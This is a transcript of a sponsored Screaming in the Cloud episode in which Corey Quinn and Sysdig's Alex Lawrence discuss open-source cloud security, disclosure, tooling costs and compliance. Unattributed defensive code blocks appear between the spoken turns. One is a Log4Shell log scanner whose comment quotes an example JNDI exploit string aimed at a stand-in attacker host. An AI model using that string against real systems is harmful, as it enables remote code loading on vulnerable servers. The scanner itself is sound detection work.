An Open-Source Mindset in Cloud Security with Alex Lawrence

Episode Summary

Alex Lawrence, Field CISO at Sysdig, joins Corey on Screaming in the Cloud to discuss how he went from studying bioluminescence and mycology to working in tech, and his stance on why open source is the future of cloud security. Alex draws an interesting parallel between the creative culture at companies like Pixar and the iterative and collaborative culture of open-source software development, and explains why iteration speed is crucial in cloud security. Corey and Alex also discuss the pros and cons of having so many specialized tools that tackle specific functions in cloud security, and the different postures companies take towards their cloud security practices. 

Episode Show Notes & Transcript

About Alex

Alex Lawrence is a Field CISO at Sysdig. Alex has an extensive history working in the datacenter as well as with the world of DevOps. Prior to moving into a solutions role, Alex spent a majority of his time working in the world of OSS on identity, authentication, user management and security. Alex's educational background has nothing to do with his day-to-day career; however, if you'd like to have a spirited conversation on bioluminescence or fungus, he'd be happy to oblige.

Links Referenced:

- sysdig.com/opensource: https://sysdig.com/opensource
- falco.org: https://falco.org
- duckbillgroup.com: https://duckbillgroup.com

Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by our friends over at Sysdig, and they have brought to me Alexander Lawrence, who’s a principal security architect over at Sysdig. Alexander, thank you for joining me.

Alex: Hey, thanks for having me, Corey.

Corey: So, we all have fascinating origin stories. Invariably you talk to someone, no one in tech emerged fully-formed from the forehead of some God. Most of us wound up starting off doing this as a hobby, late at night, sitting in the dark, rarely emerging. You, on the other hand, studied mycology, so watching the rest of us sit in the dark and growing mushrooms was basically how you started, is my understanding of your origin story. Accurate, not accurate at all, or something in between?

Alex: Yeah, decently accurate. So, I was in school during the wonderful tech bubble burst, right, high school era, and I always told everybody, there’s no way I’m going to go into technology. There’s tons of people out there looking for a job. Why would I do that? And let’s face it, everybody expected me to, so being an angsty teenager, I couldn’t have that. So, I went into college looking into whatever I thought was interesting, and it turned out I had a predilection to go towards fungus and plants.

Corey: Then you realized some of them glow and that wound up being too bright for you, so all right, we’re done with this; time to move into tech?

Alex: [laugh]. Strangely enough, my thesis, my capstone, was on the coevolution of bioluminescence across aquatic and terrestrial organisms. And so, did a lot of focused work on specifically bioluminescent fungus and bioluminescing fish, like Photoblepharon palpebratus and things like that.

Corey: When I talk to people who are trying to figure out, okay, I don’t like what’s going on in my career, I want to do something different, and their assumption is, oh, I have to start over at square one. It’s no, find the job that’s halfway between what you’re doing now and what you want to be doing, and make lateral moves rather than starting over five years in or whatnot. But I have to wonder, how on earth did you go from A to B in this context?

Alex: Yeah, so I had always done tech. My first job really was in tech at the school districts that I went to in high school. And so, I went into college doing tech. I volunteered at the ELCA and other organizations doing tech, and so it basically funded my college career. And by the time I finished up through grad school, I realized my life was going to be writing papers so that other people could do the research that I was coming up with, and I thought that sounded like a pretty miserable life.

And so, it became a hobby, and the thing I had done throughout my entire college career was technology, and so that became my new career and vocation. So, I was kind of doing both, and then ended up landing in tech for the job market.

Corey: And you’ve effectively moved through the industry to the point where you’re now in security architecture over at Sysdig, which, when I first saw Sysdig launch many years ago, it was, this is an interesting tool. I can see observability stories, I can see understanding what’s going on at a deep level. I liked it as a learning tool, frankly. And it makes sense, with the benefit of hindsight, that oh, yeah, I suppose it does make some sense that there are security implications thereof. But one of the things that you’ve said that I really want to dig into that I’m honestly in full support of because it’ll irritate just the absolute worst kinds of people is—one of the core beliefs that you espouse is that security when it comes to cloud is inherently open-source-based or at least derived. I don’t want to misstate your position on this. How do you view it?

Alex: Yeah. Yeah, so basically, the stance I have here is that the future of security in cloud is open-source. And the reason I say that is that it’s a bunch of open standards that have basically produced a lot of the technologies that we’re using in that stack, right, your web servers, your automation tooling, all of your different components are built on open stacks, and people are looking to other open tools to augment those things. And the reality is that the security environment that we’re in is changing drastically in the cloud as opposed to what it was like in the on-premises world. On-prem was great—it still is great; a lot of folks still use it and thrive on it—but as we look at the way software is built and the way we interface with infrastructure, the cloud has changed that dramatically.

Basically, things are a lot faster than they used to be. The model we have to use in order to make sure our security is good has dramatically changed, right, and all that comes down to speed and how quickly things evolve. I tend to take a position that one single brain—one entity, so to speak—can’t keep up with that rapid evolution of things. Like, a good example is Log4j, right? When Log4j hit this last year, that was a pretty broad attack that affected a lot of people. Open tooling out there, like Falco and others, had a policy to detect and help triage it within a couple of hours of it hitting the internet. With proprietary tooling, it often took much longer than two hours.
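As a concrete illustration of that community speed: Falco’s Log4Shell coverage took the form of runtime rules, flagging behavior like a Java process spawning a shell, while much of the first-hours triage elsewhere was simpler still, grepping logs for the exploit string. Here is a minimal, hypothetical Python sketch of that second approach; the regex is illustrative and nowhere near complete.

```python
#!/usr/bin/env python3
"""Hypothetical Log4Shell triage: grep web/access logs for JNDI lookups.

This is NOT how Falco works (Falco watches runtime behavior via syscalls);
it sketches the kind of stopgap scripts the community shipped within hours
of the disclosure.
"""
import re
import sys

# Canonical exploit strings look like ${jndi:ldap://attacker.example/a}.
# Attackers quickly obfuscated these (e.g., ${${lower:j}ndi:...}), so a
# real detector needs many more patterns than this single regex.
JNDI = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|nis|corba)://", re.IGNORECASE)

def scan(path: str) -> int:
    """Print and count lines in one log file that match the JNDI pattern."""
    hits = 0
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if JNDI.search(line):
                hits += 1
                print(f"{path}:{lineno}: possible Log4Shell probe: {line.strip()[:200]}")
    return hits

if __name__ == "__main__":
    # Usage: python3 log4shell_grep.py access.log other.log ...
    total = sum(scan(p) for p in sys.argv[1:])
    sys.exit(1 if total else 0)
```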

Corey: Part of me wonders what the root cause behind that delay is because it’s not that the engineers working at these companies are somehow worse than folks in the open communities. In some cases, they’re the same people. It feels like it’s almost corporate process ossification of, “Okay, we built a thing. Now, we need to make sure it goes through branding and legal and marketing and we need to bring in 16 other teams to make this work.” Whereas in the open-source world, it feels like there’s much more of a, “I push the deploy button and it’s up. The end.” There is no step two.

Alex: [laugh]. Yeah, so there is certainly a certain element of that. And I think it’s just the way different paradigms work. There’s a fantastic book out there called Creativity, Inc., and it’s basically a book about how Pixar manages itself, right? How do they deal with creating movies? How do they deal with doing what they do well?

And really, what it comes down to is fostering a culture of creativity. And that typically revolves around being able to fail fast, take risks, see if it sticks, see if it works. And it’s not that corporate entities don’t do that. They certainly do, but again, if you think about the way the open-source world works, people are submitting, you know, PRs, pull requests, they’re putting out different solutions, different fixes to problems, and the ones that end up solving it the best are often the ones that end up coming to the top, right? And so, it’s just—the way you iterate is much more akin to that kind of creativity-based mindset than what I think you get out of traditional organizations and corporations.

Corey: There’s also, I think—I don’t know if this is necessarily the exact point, but it feels like it’s at least aligned with it—where there was for a long time—by which I mean, pretty much 40 years at this point—a debate between full disclosure, telling people about the things that you have found in vendors’ products, versus responsible disclosure, or whatever the term is, where you tell the vendor, give them time to fix it, and it gets out the door. But we’ve seen again and again and again, where researchers find something, report it, and then it sits there, in some cases for years, but then when it goes public and the company looks bad as a result, they scramble to fix it. I wish it were not this way, but it seems that in some cases, public shaming is the only thing that works to get companies to secure their stuff.

Alex: Yeah, and I don’t know if it’s public shaming, per se, that does it, or it’s just priorities, or it’s just, you know, however it might go, there’s always been this notion of, “Okay, we found a breach. Let’s disclose appropriately, you know, between two entities, give time to remediate.” Because there is a potential risk that if you disclose publicly that it can be abused and used in very malicious ways—and we certainly don’t want that—but there also is a certain level of onus once the disclosure happens privately that we got to go and take care of those things. And so, it’s a balancing act.

I don’t know what the right solution is. I mean, if I did, I think everybody would benefit from it, but we just don’t know the proper answer. The workflow is complex, it is difficult, and I think doing our due diligence to make sure that we disclose appropriately is the right path to go down. And when we get those disclosures, we need to take them seriously; that’s what it comes down to.

Corey: What I find interesting is your premise that the future of cloud security is open-source. Like, I could make a strong argument that today, we definitely have an open-source culture around cloud security and need to, but you’re talking about that shifting along the fourth dimension. What’s the change? What do you see evolving?

Alex: Yeah, I think for me, it’s about the collaboration. I think there are segments of industries that communicate with each other very, very well, and I think there’s others who do a decent job, you know, behind closed doors, and I think there’s others, again, that don’t communicate at all. So, all of my background predominantly has been in higher-ed, K-12, academia, and I find that a lot of those organizations do an extremely good job of partnering together, working together to move towards, kind of, a greater good, a greater goal. An example of that would be a group out in the Pacific Northwest called NWACC—the Northwest Academic Computing Consortium. And so, it’s every university in the Northwest coming together to have CIO summits, to have security summits, to trade knowledge, to work together, basically, to have a better overall security posture.

And they do it pretty much out in the open and collaborating with each other, even though they are also direct competitors, right? They all want the same students. It’s a little bit of a different way of thinking, and they’ve been doing it for years. And I’m finding that to be a trend that’s happening more and more outside of just academia. And so, when I say the future is open, if you think about the tooling academia typically uses, it is very open-source-oriented, it is very collaborative.

There are open specifications, things like eduPerson, to be able to go and define what a user looks like. There are things like, you know, CAS and Shibboleth to do account authorization and things like that. They all collaborate on tooling in that regard. We’re seeing more of that in the commercial space as well. And so, when I say the future of security in cloud is open-source, it’s models like this that I think are becoming more and more effective, right?

It’s not just the larger entities talking to each other. It’s everybody talking with each other, everybody collaborating with each other, and having an overall better security posture. The reality is that the folks we’re defending ourselves against, they already are communicating, they already are using that model to work together to take down who they view as their targets: us, right? We need to do the same to be able to keep up. We need to be able to have those conversations openly, work together openly, and be able to set that security posture across that kind of overall space.

Corey: There’s definitely a concern that if you have all these companies and communities collaborating around security aspects in public, well, won’t the bad actors be able to see what they’re looking at and how they’re approaching it and, in some cases, move faster than they can or, in other cases, effectively wind up polluting the conversation by claiming to be good actors when they’re not? And there are so many different ways that this can manifest. It feels like fear is always the thing that stops people from going down this path, but there is some validity to that, I would imagine.

Alex: Yeah, no. And I think that certainly is true, right? People are afraid to let go of, quote-unquote, “The keys to their kingdom,” their security posture, their things like that. And it makes sense, right? There’s certain things that you would want to not necessarily talk about openly, like, specifically, you know, what Diffie–Hellman key exchange you’re using or something like that, but there are ways to have these conversations about risks and posture and tooling and, you know, ways you approach it that help everybody else out, right?

If someone finds a particularly novel way to do a detection with some sort of piece of tooling, they probably should be sharing that, right? Let’s not keep it to ourselves. Traditionally, just because you know the tool doesn’t necessarily mean that you’re going to have a way in. Certainly, you know, it can give you a path or a vector to go after, but if we can at least have open standards about how we implement and how we can go about some of these different concepts, we can all gain from that, so to speak.

Corey: Part of me wonders if the existing things that the large companies are collaborating on lead to a culture that specifically pushes back against this. A classic example from my misspent youth is that an awful lot of the anti-abuse departments at these large companies are in constant communication. Because if you work at Microsoft, or Google or Amazon, your adversary, as you see it, in the Trust and Safety Group is not those other companies. It’s bad actors attempting to commit fraud. So, when you start seeing particular bad actors emerging from certain parts of the network, sharing that makes everything better because there’s an understanding there that it’s not, “Oh, Microsoft has bad security this week,” or, “Google will wind up approving fraudulent accounts that start spamming everyone.”

Because the takeaway by the customers is not that this one company is bad; it’s, oh, the cloud isn’t safe. We shouldn’t use cloud. And that leads to worse outcomes for basically everyone. But one of the most carefully guarded secrets at all these companies is how they do fraud prevention and spam detection, because if adversaries find that out, working around them becomes a heck of a lot easier. I don’t know, for example, how AWS determines whether a massive account overage in a free-tier account is considered to be a bad actor or someone who made a legitimate mistake. I can guess, but the actual signal that they use is something that they would never in a million years tell me. They probably won’t even tell each other the specifics of that.

Alex: Certainly, and I’m not advocating that they let all of the details out, per se, but I think it would be good to be able to have more of an open posture in terms of, like, you know what tooling do they use? How do they accomplish that feat? Like, are they looking at a particular metric? How do they basically handle that posture going forward? Like, what can I do to replicate a similar concept?

I don’t need to know all the details, but it would be nice if they embraced, you know, open tooling, like say a Trivy or a Falco or whatever the thing is, right, that they’re using to do this process, and then contributed back to that project to make it better for everybody. When you kind of keep that stuff closed-source, that’s when you start running into that issue where, you know, they have that, quote-unquote, “advantage,” that other folks aren’t getting. Maybe there’s something we can do better in the community, and if we can all be better, it’s better for everybody.

Corey: There’s a constant customer pain in the fact that every cloud provider, for example, has its own security perspective—the way that identity is managed, the way that security boundaries exist, the way that telemetry from these things winds up getting represented—where a number of companies that are looking at doing things that have to work across cloud for a variety of reasons—some good, some not so good—have decided that, okay, we’re just going to basically treat all these providers as, more or less, dumb pipes and dumb infrastructure. Great, we’re just going to run Kubernetes on all these things, and then once it’s inside of our cluster, then we’ll build our own security overlay around all of these things. They shouldn’t have to do that. There should be a unified set of approaches to these things. At least, I wish there were.

Alex: Yeah, and I think that’s where you see a lot of the open standards evolving. A lot of the different CNCF projects out there are basically built on that concept. Like, okay, we’ve got Kubernetes. We’ve got a particular pipeline, we’ve got a particular type of implementation of a security measure or whatever it might be. And so, there’s a lot of projects built around how do we standardize those things and make them work cross-functionally, regardless of where they’re running.

It’s actually one of the things I quite like about Kubernetes: it makes things a little more abstract for the developers or the infrastructure folks. At one point in time, you had your on-premises stuff and you built your stuff towards how your on-prem looked. Then you went to the cloud and started building your stuff to look like what that cloud looked like. And then another cloud showed up and you had to go use that one, so you’ve got to go refactor your application to now work in that cloud.

Kubernetes has basically become, like, this gigantic API ball to interface with the clouds, and you don’t have to build an application four different ways anymore. You can build it one way and it can work on-prem, it can work in Google, Azure, IBM, Oracle, you know, whoever, Amazon, whatever it needs to be. And then that also enables us to have a standard set of tools. So, we can use things like, you know, Rego or we can use things like Falco or we can use things that allow us to build tooling to secure those things the same way everywhere we go. And the benefit of most of those tools is that they’re also configured, you know, via some level of codification, and so we can have a repository that contains our posture: apply that posture to that cluster, apply it to the other cluster in the other environment. It allows us to automate these things, go quicker, build the posture at the very beginning, along with that application.
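To make the “posture in a repository, applied to every cluster” idea concrete, here is a toy sketch in Python; in practice you would codify this in something like Rego, Kyverno, or Falco rules rather than a hand-rolled script. The input shape assumed here is what `kubectl get pods --all-namespaces -o json` emits.

```python
#!/usr/bin/env python3
"""Toy 'posture as code' check: flag privileged containers in any cluster.

A sketch of the one-repo, many-clusters idea; real deployments would reach
for OPA/Rego, Kyverno, or Falco rules instead of hand-rolled Python. The
input shape follows `kubectl get pods --all-namespaces -o json`.
"""
import json
import sys

def privileged_containers(pod_list: dict):
    """Yield (namespace, pod, container) for every privileged container."""
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        for c in pod.get("spec", {}).get("containers", []):
            if (c.get("securityContext") or {}).get("privileged"):
                yield meta.get("namespace"), meta.get("name"), c.get("name")

if __name__ == "__main__":
    # Same check against any cluster, cloud or on-prem:
    #   kubectl get pods -A -o json | python3 check_privileged.py
    findings = list(privileged_containers(json.load(sys.stdin)))
    for ns, pod, container in findings:
        print(f"privileged container: {ns}/{pod}/{container}")
    sys.exit(1 if findings else 0)
```

The same file-in, findings-out check runs unchanged whether the dump came from EKS, GKE, AKS, or a cluster in your own datacenter, which is the point of codifying posture once.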

Corey: One of the problems I feel as a customer is that so many of these companies have a model for interacting with security issues that’s frankly obnoxious. I am exhausted by the amount of chest-thumping you’ll see on keynote stages, all on the theme of “We’re the best at security.” And whenever a vulnerability researcher reports something of a wide variety of different levels of severity, it always feels like the first concern from the company is not to fix the issue, but rather to control the messaging around it.

Whenever there’s an issue, it’s very clear that they will lean on people to rephrase things, not use certain words. It’s, I don’t know if the words used to describe this cross-tenant vulnerability are the biggest problem you should be focusing on right now. Yes, I understand that you can walk and chew gum at the same time as a big company, but it almost feels like the researchers are first screaming into a void, and then they’re finally getting attention, but from all the people they don’t want to get the attention from. It feels like this is not a welcoming environment for folks to report these things in good faith.

Alex: [sigh]. Yeah, it’s not. And I don’t know what the solution is to that particular problem. I have opinions about why that exists. I won’t go into those here, but it’s cumbersome. It’s difficult. I don’t envy a lot of those research organizations.

They’re fantastic people coming up with great findings, they find really interesting stuff that comes out, but when you have to report and do that due diligence, that portion is not that fun. And then doing, you know, the fallout component, right: okay, now we have this thing we have to report, we have to go do something to fix it, you’re right. I mean, people do often get really spun up on the verbiage or the implications and not just go fix the problem. And so again, if you have ways to mitigate that are more standards-based, that aren’t specific to a particular cloud, like, you can use an open-source tool to mitigate, that can be quite the advantage.

Corey: One of the challenges that I see across a wide swath of tooling and approaches to it is that when I was trying to get some stuff to analyze CloudTrail logs in my own environment, I was really facing a bimodal distribution of options. On one end of the spectrum, it’s a bunch of crappy stuff—or good stuff; hard to say—but it’s all coming off of GitHub, open-source, build it yourself, et cetera. Good luck. And that’s okay, awesome, but there’s business value here and I’m thrilled to pay experts to make this problem go away.

The other end of the spectrum is commercial security tooling, and it is almost impossible in my experience to find anything that costs less than $1,000 a month to start providing insight from a security perspective. Now, I understand the market forces that drive this. Truly I do, and I’m sympathetic to them. It is just as easy to sell $50,000 worth of software to an awful lot of companies as it is $5,000 worth, so yeah, go where the money is. But it also means that at the small end of the market, for hobbyists and for startups just getting started, there is a price barrier to engaging in the, quote-unquote, “proper way” to do security.

So, the posture suffers. “We’ll bolt security on later when it becomes important” is the philosophy, and we’ve all seen how well that plays out in the fullness of time. How do you square that circle? I think the answer has to be open-source improving to the point where it’s not just random scripts, but renowned projects.

Alex: Correct, yeah, and I’d agree with that. And so, we’re kind of in this interesting phase. So, if you think about, like, raw Linux applications, right, Linux always has the tenet that you build an application to do one thing, and it does that one thing really, really, really well. And then you ended up with this thing called, like, you know, the Cacti monitoring stack. And so, you ended up having, like, 600 tools you strung together to get this one monitoring function done.

We’re kind of in a similar spot in a lot of ways right now in the open-source security world where, like, if you want to do scanning, you can do, like, Clair or you can do Trivy, or you have a couple different choices, right? If you want to do posture, you’ve got things like kube-bench that are out there. If you want to go do runtime security stuff, you’ve got something like Falco. So, you’ve got all these tools to string together, right, to give you all of these different components. And if you want, you can build it yourself, and you can run it yourself and it can be very fun and effective.

But at some point in your life, you probably don’t want to be care-and-feeding your child that you built, right? It’s 18 years later now, and you want to go back to having your life, and so you end up buying a tool, right? That’s why Gartner made this whole CNAPP category, right? It’s this humongous category of products that are putting all of these different components together into one gigantic package. And the whole goal there is just to make lives a little bit easier because running all the tools yourself, it’s fun, I love it, I did it myself for a long time, but eventually, you know, you want to try to work on some other stuff, too.

Corey: At one point, I wound up running the numbers of all of the first-party security offerings that AWS offered, and for most use cases of significant scale, the cost for those security services was more than the cost of the theoretical breach that they’d be guarding against. And I think that there’s a very dangerous incentive that arises when you start turning security observability into your own platform as a profit center. Because it’s, well, we could make a lot of money if we don’t actually fix the root issue and just sell tools to address and mitigate some of it—not that I think that’s the intentional direction these companies are taking, and I don’t want to ascribe malice to them, but you can feel that start to become the trend that some decisions get pushed toward.

Alex: Yeah, I mean, everything comes down to data, right? It has to be stored somewhere, processed somewhere, analyzed somewhere. That always has a cost with it. And so, there’s always this notion of the shared security model, right? We have to have someone have ownership over that data, and most of the time, that’s the end-user, right? It’s their data, it’s their responsibility.

And so, these offerings become things that they have that you can tie into to work within the ecosystem, work within their infrastructure to get that value out of your data, right? You know, where is the security model going? Where do I have issues? Where do I have misconfigurations? But again, someone has to pay for that processing time. And so, that ends up having a pretty extreme cost to it.

And so, it ends up being a hard problem to solve. And it gets even harder if you’re multi-cloud, right? You can’t necessarily use the tooling of AWS inside of Azure or inside of Google. And other products are trying to do that, right? They’re trying to be able to let you integrate their security center with other clouds as well.

And it’s kind of created this really interesting dichotomy where you almost have frenemies, right, where you’ve got, you know, a big Azure customer who’s also a big AWS customer. Well, they want to go use Defender on all of their infrastructure, and Microsoft is trying to do their best to allow you to do that. Conversely, not all clouds operate in that same capacity. And you’re correct, they all come at extremely different costs, they have different price models, they have different ways of going about it. And it becomes really difficult to figure out what is the best path forward.

Generally, my stance is anything is better than nothing, right? So, if your only choice is using Defender to do all your stuff and it costs you an arm and a leg, unfortunate, but great; at least you got something. If the path is, you know, go use this random open-source thing, great. Go do that. Early on, when I first got to Sysdig about five years ago, my big message was, you know, I don’t care what you do. At least scan your containers. If you’re doing nothing else in life, use Clair; scan the darn things. Don’t do nothing.

That’s not really a problem these days, thankfully, but now we’re more to a world where it’s like, well, okay, you’ve got your containers, you’ve got your applications running in production. You’ve scanned them, that’s great, but you’re doing nothing at runtime. You’re doing nothing in your posture world, right? Do something about it. So, maybe that is buy the enterprise tool from the cloud you’re working in, buy it from some other vendor, use the open-source tool, do something.
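In the spirit of “do something,” here is a minimal CI gate sketched in Python around Trivy’s command line. The flags used exist in recent Trivy releases, but treat the whole thing as a hedged starting point, not a finished pipeline.

```python
#!/usr/bin/env python3
"""Bare-minimum container scanning gate for CI, wrapping Trivy's CLI.

Fails the build when HIGH or CRITICAL vulnerabilities turn up. The flags
used here exist in recent Trivy releases (`trivy image --help`), but treat
this as a starting point, not a finished pipeline.
"""
import subprocess
import sys

def image_is_clean(image: str) -> bool:
    """Return True if Trivy finds no HIGH/CRITICAL vulnerabilities."""
    result = subprocess.run([
        "trivy", "image",
        "--severity", "HIGH,CRITICAL",
        "--exit-code", "1",   # nonzero exit when findings exist
        "--no-progress",
        image,
    ])
    return result.returncode == 0

if __name__ == "__main__":
    # Usage: python3 scan_gate.py myregistry/myapp:latest
    image = sys.argv[1] if len(sys.argv) > 1 else "alpine:latest"
    if not image_is_clean(image):
        print(f"blocking release: {image} has HIGH/CRITICAL findings", file=sys.stderr)
        sys.exit(1)
```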

Thankfully, we live in a world where there are plenty of open tools out there we can adopt and leverage. You used the example of CloudTrail earlier. I don’t know if you saw it, but there was a really, really cool talk at SharkFest last year from Gerald Combs where they leveraged Wireshark to be able to read CloudTrail logs. Which I thought was awesome.

Corey: That feels more than a little bit ridiculous, just because it’s—I mean I guess you could extract the JSON object across the wire then reassemble it. But, yeah, I need to think on that one.

Alex: Yeah. So, it’s actually really cool. They took the plugins from Falco that exist and rewired Wireshark to leverage those plugins to read the JSON data from CloudTrail, and then wired it into the Wireshark interface to be able to do a visual inspection of CloudTrail logs. So, just like you could do a follow-this-IP with a PCAP, you could do the same concept inside of your cloud log. So, if you look up Logray, you’ll find it on the internet out there. You’ll see demos of Gerald showing it off. It was a pretty darn cool way to use a visualization that, let’s be honest, most security professionals already know how to use, in a more modern infrastructure.
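For anyone who wants the follow-this-IP concept without the Wireshark interface (this is the same idea, not the Logray implementation), it is a few lines of Python over a raw CloudTrail log file. The sketch assumes the standard {"Records": [...]} layout of a CloudTrail delivery file; gzipped files would need gzip.open instead.

```python
#!/usr/bin/env python3
"""'Follow this IP' over a CloudTrail log file, PCAP-style.

Filters CloudTrail records by sourceIPAddress and prints one caller's
activity in time order. Assumes the standard {"Records": [...]} layout of
a CloudTrail delivery file; gzipped files would need gzip.open instead.
"""
import json
import sys

def follow_ip(path: str, ip: str) -> None:
    with open(path) as fh:
        records = json.load(fh).get("Records", [])
    for r in sorted(records, key=lambda rec: rec.get("eventTime", "")):
        if r.get("sourceIPAddress") == ip:
            who = r.get("userIdentity", {}).get("arn", "unknown")
            print(f"{r.get('eventTime')} {r.get('eventSource')} "
                  f"{r.get('eventName')} by {who}")

if __name__ == "__main__":
    # Usage: python3 follow_ip.py trail.json 203.0.113.7
    follow_ip(sys.argv[1], sys.argv[2])
```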

Corey: One last topic that I want to go into with you before we call this an episode is something that’s been bugging me more and more over the years—and it annoyed me a lot when I had to deal with this stuff as a SOC 2 control owner and it’s gotten exponentially worse every time I’ve had to deal with it ever since—and that is the seeming view of compliance and security as being one and the same, to the point where in one of my accounts that I secured rather well, I thought, I installed Security Hub and finally jumped through all those hoops and paid the taxes and the rest, and then waited 24 hours to gather some data, then 24 hours to gather more. Awesome. I applied the AWS-approved foundational security benchmark to it and it started shrieking its bloody head off about all of the things that were insecure and not configured properly. One of them, okay, great: it complained that the ‘Block all S3 Public Access’ setting was not turned on for the account. So, I turned that on. Great.

Now, it’s still complaining that I have not gone through and also enabled the ‘Block Public Access’ setting on each and every S3 bucket within it. That is not improving your security posture in any meaningful way. That is box-checking so that someone in a compliance role can check that off and move on to the next thing on the clipboard. Now, originally, these things started off well-intentioned, but the result is I’m besieged by findings that don’t actually matter, and that means I’m not going to have time to focus on the things that actually do. Please tell me I’m wrong on some of this.
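For what it’s worth, the box-checking itself is only a few lines of boto3 against standard AWS APIs, which rather underlines the point: checking the box is cheap, and it is not the same thing as getting more secure. A hedged sketch:

```python
#!/usr/bin/env python3
"""Check the box: enable S3 Block Public Access account-wide and per bucket.

A hedged sketch against standard boto3 APIs. It satisfies the Security Hub
control; whether it meaningfully changes your posture is the point under
debate above.
"""
import boto3

BLOCK_ALL = {
    "BlockPublicAcls": True,
    "IgnorePublicAcls": True,
    "BlockPublicPolicy": True,
    "RestrictPublicBuckets": True,
}

account_id = boto3.client("sts").get_caller_identity()["Account"]

# The account-wide setting (the one turned on first in the anecdote).
boto3.client("s3control").put_public_access_block(
    AccountId=account_id,
    PublicAccessBlockConfiguration=BLOCK_ALL,
)

# ...and the per-bucket settings the benchmark still complains about.
s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    s3.put_public_access_block(
        Bucket=bucket["Name"],
        PublicAccessBlockConfiguration=BLOCK_ALL,
    )
    print(f"blocked public access on {bucket['Name']}")
```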

Alex: [laugh].

Corey: I really need to hear that.

Alex: I can’t. Unfortunately, I agree with you that a lot of that seems erroneous. But let’s be honest, auditors have a job for a reason.

Corey: Oh, I’m not besmirching the role of the auditor. Far from it. The problem I run into is that it’s the Human Nessus report that dumps out, “Here’s the 700 things to go fix in your environment,” as opposed to, “Here’s the five things you can do right now that will meaningfully improve your security posture.”

Alex: Yeah. And so, I think that’s a place we see a lot of vendors moving, and I think that is the right path forward. Because we are in a world where we generate reports that are miles and miles long, we throw them over a wall to somebody, and that person says, “Are you crazy?” Like, “You want me to go do what with my time?” Like, “No. I can’t. No. This is way too much.”

And so, if we can narrow these things down to what matters the most today, and then what can we get rid of tomorrow, that makes life better for everybody. There are certainly ways to accomplish that across a lot of different dimensions, be that vulnerability management, or configuration management stuff, runtime stuff, and that is certainly the way we should approach it. Unfortunately, not all frameworks allow us to look at it that way.

Corey: I mean, even AWS’s thing here is yelling at me for a number of services not having encryption-at-rest turned on, like CloudTrail logs, or SNS topics. It’s, okay, let’s be very clear what that is defending against: someone stealing drives out of a data center and taking them off to view the data. Is that something that I need to worry about in a public cloud provider context? Not unless I’m the CIA or something pretty close to that. I mean, if you can get my data out of an AWS data center and survive, congratulations, I kind of feel like you’ve earned it at this point. But that obscures things I need to be doing that I’m not.

Alex: Back in the day, I had a customer who used to have—they had storage arrays and their storage arrays’ logins were the default login that they came with the array. They never changed it. You just logged in with admin and no password. And I was like, “You know, you should probably fix that.” And he sent a message back saying, “Yeah, you know, maybe I should, but my feeling is that if it got that far into my infrastructure where they can get to that interface, I’m already screwed, so it doesn’t really matter to me if I set that admin password or not.”

Corey: Yeah, there is a defense-in-depth argument to be made. I am not disputing that, but the Cisco world is melting down right now because of a bunch of very severe vulnerabilities that have been disclosed. But everything to exploit these things always requires, well, you need access to the management interface. Back when I was a network administrator at Chapman University in 2006, even then, I knew, “Well, we certainly don’t want to put the management interfaces on the same VLAN that’s passing traffic.”

So, is it good that there’s an unpatched vulnerability there? No, but Shodan, the security vulnerability search engine, shows over 80,000 affected instances on the public internet. It would never have occurred to me to put the management interface of important network gear on the public internet. That just is… I don’t understand that.

Alex: Yeah.

Corey: So, on some level, I think the lesson here is that there’s always someone who has something else to focus on at a given moment, and… it’s a spectrum: no one is fully secure, but ideally, you don’t want to be the lowest of low-hanging fruit.

Alex: Right, right. I mean, if you were fully secure, you’d just turn it off, but unfortunately, we can’t do that. We have to have it be accessible because that’s our jobs. And so, if we’re having it be accessible, we got to do the best we can. And I think that is a good point, right? Not being the worst should be your goal, at the very, very least.

Doing the bare minimums, looking at those checks, deciding if they’re relevant for you or not. Just because it says the configuration is required, you know, is it required in your use case? Is it required for your requirements? Like, you know, are you a FedRAMP customer? Okay, yeah, it’s probably a requirement because, you know, it’s FedRAMP; they’re going to tell you you’ve got to do it. But is it your dev environment? Is it your demo stuff? You know, where does it exist, right? There are certain areas where it makes sense to deal with it, and certain areas where it doesn’t.

Corey: I really want to thank you for taking the time to talk me through your thoughts on all this. If people want to learn more, where’s the best place for them to find you?

Alex: Yeah, so they can go to sysdig.com/opensource; there’s a bunch of open-source resources there. Or they can go to falco.org and read about the stuff on that site as well. Lots of different ways to kind of go and get yourself educated on stuff in this space.

Corey: And we will, of course, put links to that into the show notes. Thank you so much for being so generous with your time. I appreciate it.

Alex: Yeah, thanks for having me. I appreciate it.

Corey: Alexander Lawrence, principal security architect at Sysdig. I’m Cloud Economist Corey Quinn, and this episode has been brought to us by our friends, also at Sysdig. If you’ve enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you’ve hated this podcast, please leave a five-star review on your podcast platform of choice, along with an insulting comment that I will then read later when I pick it off the wire using Wireshark.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.
